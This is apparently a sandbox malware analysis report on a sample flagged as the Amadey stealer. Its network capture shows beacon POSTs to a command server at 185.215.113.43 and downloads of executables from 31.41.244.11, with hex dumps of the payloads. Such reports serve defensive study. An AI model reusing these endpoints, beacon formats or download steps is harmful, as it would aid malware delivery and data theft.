Jan 7, 2025 10:09:34.380134106 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 39 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032914001&unit=246122658369
Jan 7, 2025 10:09:35.074311972 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	50056	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:35.089657068 CET	66	OUT	GET /files/7124748205/mQvinTe.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:35.783482075 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:35 GMT Content-Type: application/octet-stream Content-Length: 1038693 Last-Modified: Tue, 07 Jan 2025 02:01:09 GMT Connection: keep-alive ETag: "677c8ae5-fd965" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 64 86 05 00 d4 ec d7 4c 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 08 00 00 ae 01 00 00 38 01 00 00 00 00 00 64 b7 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 03 00 00 04 00 00 37 b3 0f 00 02 00 00 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc fb 01 00 c8 00 00 00 00 70 02 00 fc be 00 00 00 50 02 00 bc 16 00 00 05 7f 0f 00 60 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 10 07 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEdL#8d@07pP`Z.text `.rdatalRT@@.data/ @.pdataP@@.rsrcp*@@
Jan 7, 2025 10:09:35.783504009 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 5c 24 08 48 89 74 24 10 57 48 81 ec 20 09 00 00 48 8b f9 b9 27 00 00 00 Data Ascii: H\$Ht$WH H'LODH$ Ha39wv8H_ LHHL$ AHT$ H$ fH;wrH$ H5H(H`@SH
Jan 7, 2025 10:09:35.783540964 CET	1236	IN	Data Raw: ec 20 48 8b d9 48 8d 15 e0 ff ff ff 33 c9 ff 15 1c b2 01 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc 48 83 ec 28 83 3d 09 1c 02 00 00 74 07 b8 04 40 00 80 eb 1f 48 85 d2 74 18 48 8b 0d f8 1b 02 00 4c 8b ca 45 33 c0 ba 02 80 00 00 ff 15 97 b4 01 00 33 Data Ascii: HH3HH [H(=t@HtHLE33H(a(uA(3H\$Ht$WH zH;ytbHHcHH@Hj{H~,E3D9C~3HAf2HD;C\|H/HcCH3f$F{H\$0Ht$8H
Jan 7, 2025 10:09:35.785995007 CET	1236	IN	Data Raw: e8 41 9e 01 00 85 c0 75 10 48 89 1f 48 8b 03 48 8b cb ff 50 08 33 c0 eb 1e 48 8d 15 74 b2 01 00 41 b8 10 00 00 00 48 8b ce e8 18 9e 01 00 85 c0 74 d7 b8 02 40 00 80 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc 48 83 ec 28 83 41 08 ff 8b 41 Data Ascii: AuHHHP3HtAHt@H\$0Ht$8H _H(AAuHP03H(H\$WH HHHH2tHHH\$0H _H\$Ht$ WH0HIHHtHHPHOHtHPHOHH_HOf
Jan 7, 2025 10:09:35.788326979 CET	1236	IN	Data Raw: 8b 07 48 8b cf ff 50 08 48 8b 4e 30 48 8b 55 00 41 b0 01 4c 89 71 18 48 83 c1 10 e8 c4 f1 00 00 41 3a c6 0f 85 00 01 00 00 ff 15 a1 a8 01 00 8b 55 08 48 8d 4c 24 30 8b d8 4c 89 74 24 30 44 89 74 24 38 44 89 74 24 3c e8 77 f6 ff ff 4c 8b 5d 00 48 Data Ascii: HPHN0HUALqHA:UHL$0Lt$0Dt$8Dt$<wL]HT$0AIfHfA;uEHL$0D$8LcE;}4HDjHP@HL$0I;HHRHD$0fF4XHL$0D\$8c)A;uHhHP8HN0HUAL
Jan 7, 2025 10:09:35.788341045 CET	672	IN	Data Raw: a6 01 00 48 8b d6 48 8b cb ff 15 15 a6 01 00 48 8d 56 08 48 8b cb ff 15 08 a6 01 00 b8 01 00 00 00 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 48 83 ec 70 4c 8b e1 33 c9 Data Ascii: HHHVHH\$0Ht$8H _HHXHhHpHx ATHpL3IHD2LIHH$HHufALIHHHt6HtHHDLHHHtH=HV
Jan 7, 2025 10:09:35.788351059 CET	1236	IN	Data Raw: 48 8b 4c 24 64 89 4c 24 40 83 64 24 38 00 83 64 24 30 00 44 8b cd 45 33 c0 33 d2 49 8b cc 4c 89 6c 24 28 89 5c 24 20 ff 15 67 9e 01 00 ba 07 00 00 00 49 8b cc ff 15 51 9e 01 00 48 8b d6 49 8b cd 48 8b d8 ff 15 62 9e 01 00 48 8b d7 49 8b cc ff 15 Data Ascii: HL$dL$@d$8d$0DE33ILl$(\$ gIQHIHbHIVI%II3H!I3d$ E3E33HL$I[ Ik(Is0I{8IA^A]A\@SUVH@HT$pHD_HHL$p
Jan 7, 2025 10:09:35.792134047 CET	1236	IN	Data Raw: 28 4a 8b 44 23 18 33 d2 48 89 44 24 20 ff 15 d5 9b 01 00 4a 8b 44 23 18 4c 8d 9c 24 d0 00 00 00 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 49 8b e3 41 5f 41 5c 5f c3 cc cc cc 40 53 48 83 ec 20 83 3d 83 f9 01 00 00 74 22 48 8d 1d 92 f9 01 00 48 8b 0b 48 Data Ascii: (JD#3HD$ JD#L$I[ Ik(Is0IA_A\_@SH =t"HHHtH#H {uH [HXH}WHH?HtHL$ D$ 3HXH(HuHH(tt3HSH`3@H
Jan 7, 2025 10:09:35.793091059 CET	1236	IN	Data Raw: 5f c3 cc cc 48 89 5c 24 08 57 48 83 ec 20 44 8b 41 0c 40 8a fa 48 8b d9 45 8b c8 44 2b 49 08 41 83 e9 01 41 83 f9 01 7d 3e 41 83 f8 40 7e 0c 41 8b c0 99 2b c2 d1 f8 8b c8 eb 0f b9 04 00 00 00 41 83 f8 08 8d 41 0c 0f 4f c8 42 8d 04 09 83 f8 01 7d Data Ascii: _H\$WH DA@HED+IAA}>A@~A+AAOB}A+AHHcKH@<CHHcKHH\$0H _H\$Ht$WH 3HH@8:tHH8uDIED+AAA;~:A@~A+AAOB
Jan 7, 2025 10:09:35.793106079 CET	672	IN	Data Raw: 74 24 18 57 48 83 ec 40 48 83 21 00 83 61 08 00 83 61 0c 00 48 8b f2 ba 03 00 00 00 41 8b e8 48 8b d9 e8 35 f8 ff ff 8b 7e 08 85 ff 74 4a 03 ff 3b 7b 0c 7c 0a 8b d7 48 8b cb e8 1d f8 ff ff 48 83 64 24 38 00 48 8b 0b 48 83 64 24 30 00 44 8b 4e 08 Data Ascii: t$WH@H!aaHAH5~tJ;{\|HHd$8HHd$0DNLGD$(HL$ 3HHcCHl$XHt$`HH\$PH@_HHXHhHpWH0H```HHH\|$,HL$ \|$,H\$ HAH
Jan 7, 2025 10:09:35.793116093 CET	1236	IN	Data Raw: 24 88 10 00 00 8b c7 4d 8b c5 48 8d 4c 04 30 e8 ce 80 01 00 3b c3 75 d5 41 03 fd 41 b6 01 49 03 f5 eb 8b 8b c7 2b ef 48 8d 4c 24 30 48 8d 54 04 30 44 8b c5 4c 03 f8 8b fd ff 15 d9 92 01 00 49 81 ff 00 00 10 00 77 11 48 8b b4 24 80 10 00 00 e9 1a Data Ascii: $MHL0;uAAI+HL$0HT0DLIwH$A9\$2H8A_A^A]A\_^][H\$Ht$WH@HcA9HufzHd$ d$(d$,HL$ LB<t&A<t<tHL$ HH

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	50059	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:39.049885988 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 33 32 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1033224001&unit=246122658369
Jan 7, 2025 10:09:39.758128881 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	50061	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:39.768157959 CET	60	OUT	GET /files/armen/random.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:40.468286991 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:40 GMT Content-Type: application/octet-stream Content-Length: 500224 Last-Modified: Mon, 06 Jan 2025 15:03:34 GMT Connection: keep-alive ETag: "677bf0c6-7a200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ad f0 7b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 96 07 00 00 0a 00 00 00 00 00 00 4e b4 07 00 00 20 00 00 00 c0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 b3 07 00 57 00 00 00 00 c0 07 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{g0N @ @W6 H.textT `.rsrc6@@.reloc@B0H$\gZ$th`LKADBEMBSGQSFFE@ROB?FKFpeaGEPOhYYY_Z$Y_ZY_Z%Y_ZYYYYY\Z/Y\Z Y\Z%YYY^\ZY^\ZYbKQLYdoh9M$;tt$
Jan 7, 2025 10:09:40.468472958 CET	224	IN	Data Raw: 1b b3 b4 38 b4 b4 b4 a8 1a b3 b4 64 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 e4 ae b4 d0 a4 b4 b4 78 26 b3 b4 98 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 5c 26 b3 Data Ascii: 8dx&\&tt\@O<@ATBPS@SStRttPS@S
Jan 7, 2025 10:09:40.468482971 CET	1236	IN	Data Raw: a2 af b4 b4 28 b3 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 74 b4 b4 f4 86 42 4f 48 45 51 b4 b4 d0 a4 b4 b4 b4 e4 ae b4 b4 a2 b4 b4 b4 16 ae b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 74 b4 b4 72 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 Data Ascii: (tBOHEQtr
Jan 7, 2025 10:09:40.468492031 CET	224	IN	Data Raw: 29 2f 58 b6 b5 b5 87 9c 21 da 0a a5 30 bd ab b4 b4 cb b4 b4 b4 b4 29 2f 58 b6 b5 b5 87 30 13 c2 0a a5 30 a6 a3 b4 b4 cb b4 b4 b4 b4 29 2f 58 b6 b5 b5 87 ca bb 1c 03 a5 30 21 a6 b4 b4 cb b4 b4 b4 b4 29 2f 58 b6 b5 b5 87 8f ea 1a ef a5 30 57 a5 b4 Data Ascii: )/X!0)/X00)/X0!)/X0W)/X7D0)/XSP00)/Xy0)/XR0)/Xf0V)/Xu0)/X
Jan 7, 2025 10:09:40.468508959 CET	1236	IN	Data Raw: b5 b5 87 c6 db 3d d8 a5 30 7d ac b4 b4 cb b4 b4 b4 b4 29 2f 58 b6 b5 b5 87 bb e4 18 d6 a5 30 91 a5 b4 b4 cb b4 b4 b4 b4 29 2f 58 b6 b5 b5 87 c4 ca 7f d2 a5 30 f5 ad b4 b4 cb b4 b4 b4 b4 29 2f 58 b6 b5 b5 87 24 04 91 d1 a5 30 5e ae b4 b4 cb b4 b4 Data Ascii: =0})/X0)/X0)/X$0^)/X0)/X*0)/X^0)/Xpb0)/X(:0)/X<0)/XJ0)/X
Jan 7, 2025 10:09:40.468530893 CET	1236	IN	Data Raw: 2f 34 b6 b5 b5 2b 2f 18 b6 b5 b5 ed 2f 54 b6 b5 b5 56 a6 7c 20 cb 22 a9 b4 b4 29 2f 18 b6 b5 b5 83 eb 2b b0 90 ed 70 90 b0 b4 b4 b4 b4 ed 70 90 ac b2 b4 b4 b3 ed 70 90 a8 b4 b4 b4 b4 ed 70 90 a4 b4 b4 b4 b4 ed 70 90 a0 b4 b4 b4 b4 b5 9f 88 74 b3 Data Ascii: /4+//TV\| ")/+pppppt1+/8/Tfs)+3tFf13tFf11 1,*J4o+/T18,/)+3m13m11
Jan 7, 2025 10:09:40.468548059 CET	1236	IN	Data Raw: b4 a5 6f f3 2b 2f 54 b6 b5 b5 cb eb ae b4 b4 ed 2f d4 b6 b5 b5 b4 b4 b4 b4 29 2f 4c b6 b5 b5 29 74 ac 2b 2f ec b6 b5 b5 29 2f 30 b6 b5 b5 2b 2f e8 b6 b5 b5 ed 2f 54 b6 b5 b5 01 52 06 dd cb 1f ae b4 b4 29 a7 9c e9 ae a4 13 a0 e9 ae a4 2b ea 33 f2 Data Ascii: o+/T/)/L)t+/)/0+//TR)+3]CLx13]CLx11 1,,44,4,44qQo+/T)/L)t)3;h#3;h#)''/++hpt+p
Jan 7, 2025 10:09:40.468559027 CET	672	IN	Data Raw: b5 b5 d5 ce c6 0e cb bb b3 b4 b4 13 9c e9 ae a4 29 a7 a0 e9 ae a4 83 be 31 c6 b3 2b f2 b3 c2 a5 05 f2 31 d4 b3 31 bc b4 a5 20 f4 31 bb aa a5 18 f3 2c f2 94 ea 84 ec ac f2 fc 89 20 f8 9f fb 8f ea 1a ef be f2 b3 a5 6f f3 2b 2f 54 b6 b5 b5 cb 04 b3 Data Ascii: )1+11 1, o+/T)+3aJ!13aJ!11 1,,44,4,44 o+/Tz)gqa3VYW/T/T
Jan 7, 2025 10:09:40.468569994 CET	1236	IN	Data Raw: 9c af b4 b4 cb b4 b4 b4 b4 29 6f 30 87 af d9 ae 03 a5 30 da ad b4 b4 cb b4 b4 b4 b4 29 6f 30 87 ff 7e 82 01 a5 30 fa af b4 b4 cb b4 b4 b4 b4 29 6f 30 87 13 3a 48 00 a5 30 81 b1 b4 b4 cb b4 b4 b4 b4 29 6f 30 87 ed 1c 76 f6 a5 30 80 ae b4 b4 cb b4 Data Ascii: )o00)o0~0)o0:H0)o0v0)o0P0)o0ZH0)o0=A0)o0C0)o0@0)o0'0^)o00)o0T0)o0
Jan 7, 2025 10:09:40.468580961 CET	1236	IN	Data Raw: b4 b4 13 a4 e9 ae a4 29 a7 a8 e9 ae a4 83 be 31 c6 b3 2b f2 b3 c2 a5 05 f2 31 d4 b3 31 bc b4 a5 20 f4 31 bb aa a5 18 f3 2c f2 94 ea 84 ec ac f2 fc c3 65 67 a9 fb 36 d4 39 15 be f2 b3 a5 6f f3 2b 6f 24 cb e6 b0 b4 b4 29 6f f8 29 b4 2b 6f f4 29 6f Data Ascii: )1+11 1,eg69o+o$)o)+o)o)+o)+31311 1,egCo+o$Do$P)o)l)o{",oo$Dho*_gjco+o$)o)+o
Jan 7, 2025 10:09:40.473157883 CET	1236	IN	Data Raw: 61 cb 78 b4 b4 b4 29 6f f8 29 6f 08 ed 6f 24 36 d4 39 15 cb 8a b4 b4 b4 29 6f 1c 29 67 cc 2b ac ed 6f 24 fd 70 57 68 cb 9e b4 b4 b4 29 6f f8 ed 6f 24 41 79 4f 52 cb ad b4 b4 b4 ed 6f 24 6c dd 03 74 cb d6 bf b5 b5 a5 95 30 b4 b4 b4 b4 b4 5f 2b cf Data Ascii: ax)o)oo$69)o)g+o$pWh)oo$AyORo$lt0_+a]^1x)o+o+o)+3(fr13(fr11 4,g1,oo)o+o530L)o.X*0)o'0)oB0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	50065	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:43.638293982 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 33 35 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1033551001&unit=246122658369
Jan 7, 2025 10:09:44.383939028 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	50067	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:44.396202087 CET	60	OUT	GET /files/kitty/random.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:45.105190039 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:44 GMT Content-Type: application/octet-stream Content-Length: 1038693 Last-Modified: Tue, 07 Jan 2025 02:01:08 GMT Connection: keep-alive ETag: "677c8ae4-fd965" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 64 86 05 00 d4 ec d7 4c 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 08 00 00 ae 01 00 00 38 01 00 00 00 00 00 64 b7 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 03 00 00 04 00 00 37 b3 0f 00 02 00 00 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc fb 01 00 c8 00 00 00 00 70 02 00 fc be 00 00 00 50 02 00 bc 16 00 00 05 7f 0f 00 60 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 10 07 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEdL#8d@07pP`Z.text `.rdatalRT@@.data/ @.pdataP@@.rsrcp*@@
Jan 7, 2025 10:09:45.105205059 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 5c 24 08 48 89 74 24 10 57 48 81 ec 20 09 00 00 48 8b f9 b9 27 00 00 00 Data Ascii: H\$Ht$WH H'LODH$ Ha39wv8H_ LHHL$ AHT$ H$ fH;wrH$ H5H(H`@SH
Jan 7, 2025 10:09:45.105216980 CET	1236	IN	Data Raw: ec 20 48 8b d9 48 8d 15 e0 ff ff ff 33 c9 ff 15 1c b2 01 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc 48 83 ec 28 83 3d 09 1c 02 00 00 74 07 b8 04 40 00 80 eb 1f 48 85 d2 74 18 48 8b 0d f8 1b 02 00 4c 8b ca 45 33 c0 ba 02 80 00 00 ff 15 97 b4 01 00 33 Data Ascii: HH3HH [H(=t@HtHLE33H(a(uA(3H\$Ht$WH zH;ytbHHcHH@Hj{H~,E3D9C~3HAf2HD;C\|H/HcCH3f$F{H\$0Ht$8H
Jan 7, 2025 10:09:45.105230093 CET	1236	IN	Data Raw: e8 41 9e 01 00 85 c0 75 10 48 89 1f 48 8b 03 48 8b cb ff 50 08 33 c0 eb 1e 48 8d 15 74 b2 01 00 41 b8 10 00 00 00 48 8b ce e8 18 9e 01 00 85 c0 74 d7 b8 02 40 00 80 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc 48 83 ec 28 83 41 08 ff 8b 41 Data Ascii: AuHHHP3HtAHt@H\$0Ht$8H _H(AAuHP03H(H\$WH HHHH2tHHH\$0H _H\$Ht$ WH0HIHHtHHPHOHtHPHOHH_HOf
Jan 7, 2025 10:09:45.105242014 CET	1236	IN	Data Raw: 8b 07 48 8b cf ff 50 08 48 8b 4e 30 48 8b 55 00 41 b0 01 4c 89 71 18 48 83 c1 10 e8 c4 f1 00 00 41 3a c6 0f 85 00 01 00 00 ff 15 a1 a8 01 00 8b 55 08 48 8d 4c 24 30 8b d8 4c 89 74 24 30 44 89 74 24 38 44 89 74 24 3c e8 77 f6 ff ff 4c 8b 5d 00 48 Data Ascii: HPHN0HUALqHA:UHL$0Lt$0Dt$8Dt$<wL]HT$0AIfHfA;uEHL$0D$8LcE;}4HDjHP@HL$0I;HHRHD$0fF4XHL$0D\$8c)A;uHhHP8HN0HUAL
Jan 7, 2025 10:09:45.105259895 CET	672	IN	Data Raw: a6 01 00 48 8b d6 48 8b cb ff 15 15 a6 01 00 48 8d 56 08 48 8b cb ff 15 08 a6 01 00 b8 01 00 00 00 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 48 83 ec 70 4c 8b e1 33 c9 Data Ascii: HHHVHH\$0Ht$8H _HHXHhHpHx ATHpL3IHD2LIHH$HHufALIHHHt6HtHHDLHHHtH=HV
Jan 7, 2025 10:09:45.105330944 CET	1236	IN	Data Raw: 48 8b 4c 24 64 89 4c 24 40 83 64 24 38 00 83 64 24 30 00 44 8b cd 45 33 c0 33 d2 49 8b cc 4c 89 6c 24 28 89 5c 24 20 ff 15 67 9e 01 00 ba 07 00 00 00 49 8b cc ff 15 51 9e 01 00 48 8b d6 49 8b cd 48 8b d8 ff 15 62 9e 01 00 48 8b d7 49 8b cc ff 15 Data Ascii: HL$dL$@d$8d$0DE33ILl$(\$ gIQHIHbHIVI%II3H!I3d$ E3E33HL$I[ Ik(Is0I{8IA^A]A\@SUVH@HT$pHD_HHL$p
Jan 7, 2025 10:09:45.105355024 CET	1236	IN	Data Raw: 28 4a 8b 44 23 18 33 d2 48 89 44 24 20 ff 15 d5 9b 01 00 4a 8b 44 23 18 4c 8d 9c 24 d0 00 00 00 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 49 8b e3 41 5f 41 5c 5f c3 cc cc cc 40 53 48 83 ec 20 83 3d 83 f9 01 00 00 74 22 48 8d 1d 92 f9 01 00 48 8b 0b 48 Data Ascii: (JD#3HD$ JD#L$I[ Ik(Is0IA_A\_@SH =t"HHHtH#H {uH [HXH}WHH?HtHL$ D$ 3HXH(HuHH(tt3HSH`3@H
Jan 7, 2025 10:09:45.105366945 CET	448	IN	Data Raw: 5f c3 cc cc 48 89 5c 24 08 57 48 83 ec 20 44 8b 41 0c 40 8a fa 48 8b d9 45 8b c8 44 2b 49 08 41 83 e9 01 41 83 f9 01 7d 3e 41 83 f8 40 7e 0c 41 8b c0 99 2b c2 d1 f8 8b c8 eb 0f b9 04 00 00 00 41 83 f8 08 8d 41 0c 0f 4f c8 42 8d 04 09 83 f8 01 7d Data Ascii: _H\$WH DA@HED+IAA}>A@~A+AAOB}A+AHHcKH@<CHHcKHH\$0H _H\$Ht$WH 3HH@8:tHH8uDIED+AAA;~:A@~A+AAOB
Jan 7, 2025 10:09:45.105377913 CET	1236	IN	Data Raw: 30 48 83 c4 20 5f c3 cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 83 21 00 83 61 08 00 83 61 0c 00 48 8b fa 8b 52 08 48 8b d9 e8 b7 e3 ff ff 4c 8b 1f 48 8b 0b 41 0f b7 03 49 83 c3 02 66 89 01 48 83 c1 02 66 85 c0 75 ec 8b 47 08 48 8d 4b 10 Data Ascii: 0H _H\$Ht$WH H!aaHRHLHAIfHfuGHKCHcccW~L_HKAIfHfuGHt$8CHH\$0H _HHXHhHpHx ATH0IcAHBH;A~y+Eu?;yu:H"D!BD!BQH\|
Jan 7, 2025 10:09:45.110281944 CET	1236	IN	Data Raw: 00 48 2b e0 48 8b 01 4d 8b e1 49 8b f8 48 8b ea 45 33 c9 45 33 c0 33 d2 48 8b f1 ff 50 20 49 8b 04 24 33 db 41 89 5c 24 08 48 8b cd 88 18 ff 15 3c 90 01 00 48 8b cf 4c 63 e8 ff 15 30 90 01 00 8b eb 44 8a f3 4c 8b fb 48 8b fb 89 44 24 20 48 8b 06 Data Ascii: H+HMIHE3E33HP I$3A\$H<HLc0DLHD$ HAHT<0L$D+HP;$;Ht$0D:tAHcL$ +;wcH$LHL0;tz8IHA+;w&H$MHL0

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	50072	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:48.413903952 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 33 35 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1033552001&unit=246122658369
Jan 7, 2025 10:09:49.117166996 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Target ID:	0
Start time:	04:07:05
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf60000
File size:	3'312'128 bytes
MD5 hash:	7638E458B00BE1A00936AB9419267621
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

